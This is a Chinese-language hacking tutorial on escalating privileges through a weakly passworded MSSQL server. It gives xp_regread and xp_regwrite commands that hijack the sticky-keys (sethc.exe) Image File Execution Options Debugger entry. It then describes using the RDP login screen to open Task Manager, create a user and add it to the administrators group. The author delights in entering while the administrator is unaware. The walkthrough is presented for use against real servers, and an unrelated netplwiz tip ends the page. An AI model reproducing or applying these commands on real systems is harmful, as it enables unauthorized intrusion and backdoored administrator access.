1433弱口令映像劫持後門快速提權法

提權條件:
1.服務器開啓了終端端口(終端端口未必是3389,能夠自行查詢)
2.服務器的粘滯鍵功能無損,只要能夠正常彈出便可
3.服務器未禁止註冊表編輯(即寫入功能)

羅嗦一句:1433提權沒有一種方法是萬能,有時要多種方法結合,管理員的安全意識都在提升,如今沒有幾年前那麼單純的cmdshll就能提起來的了

開始sqltools登陸目標服務器:
運行工具的dos命令,發現Error Message:xpsql.cpp: 錯誤 5 來自 CreateProcess（第 737 行）在之前的授漁課程中說過這是cmd.exe的權限被限制了也提供了繞過的方法,在此再也不贅述,請看之前的教程




下面收集下服務器的相關資料和信息,以備提權使用

sql命令查詢服務器的版本等相關信息:EXEC xp_msver




因爲組件xplog70.dll被刪除了,沒法顯示,下面再看下終端信息

sql命令讀取服務器終端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'




終端端口爲3389,鏈接測試終端端口,並測試shift粘滯鍵功能




鏈接正常,粘滯鍵測試正常彈出,再去收集下其餘信息


 

c盤下有sql的安裝目錄,這個但是好東西,之前授漁也講過請自行查閱

下面這裏是這課的核心重點了,請十二萬分關注
先發布三條命令

1.sql命令查詢註冊表粘滯鍵是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

2.sql命令劫持註冊表粘滯鍵功能,替換成任務管理器(固然你也能夠替換成你想要的其餘命令)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql命令刪除註冊表粘滯鍵的劫持功能保護你的服務器再也不被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

好了,咱們替換後查詢一下看看是否正確寫入註冊表了




查詢結果顯示正常寫入,下面就鏈接終端,五次shift,彈出可愛的任務管理器了,尊敬的管理員還在上面呢,他還不知道咱們在悄悄的潛入進來了,太好玩了.


 

看下張圖,點文件--新建任務,咱們新建個explorer的任務


 

當程序運好後咱們就看到了一個臨時的桌面系統了,打開計算管理工具,什麼?不會開?那位同窗,你可要補習下電腦系統知識先了,個人電腦上右鍵,彈出菜單點管理啊

這時咱們找到計算機管理工具裏的本地用戶和組,打開用戶的選項,添加新帳號和密碼吧.


 

這裏你也能夠找到cmd命令去創建用戶,固然,這時cmd的權限是被禁用的,還要改權限,比較麻煩,你也能夠找其餘目錄下cmd.exe,有些權限設置得很差的,就能夠執行了,這裏
咱們就用計算機管理來建立用戶,就當是吃快餐面,方便嘛.跑題了跑題了******

接下來幹嘛?固然要把新建的帳號添加到管理組了,用腳趾頭想的人都知道*^_^*




一切KO了,不對應該是OK了,那麼就終端登陸吧,看當作果,嘿嘿,還不錯的一臺服務器.


 

 

http://www.spiger.cn/article/145.html

 

打開「開始」→「運行」，在「運行」一欄中輸入「Rundll32 netplwiz.dll,UsersRunDll」命令打開用戶賬戶窗口（注意區分大小寫）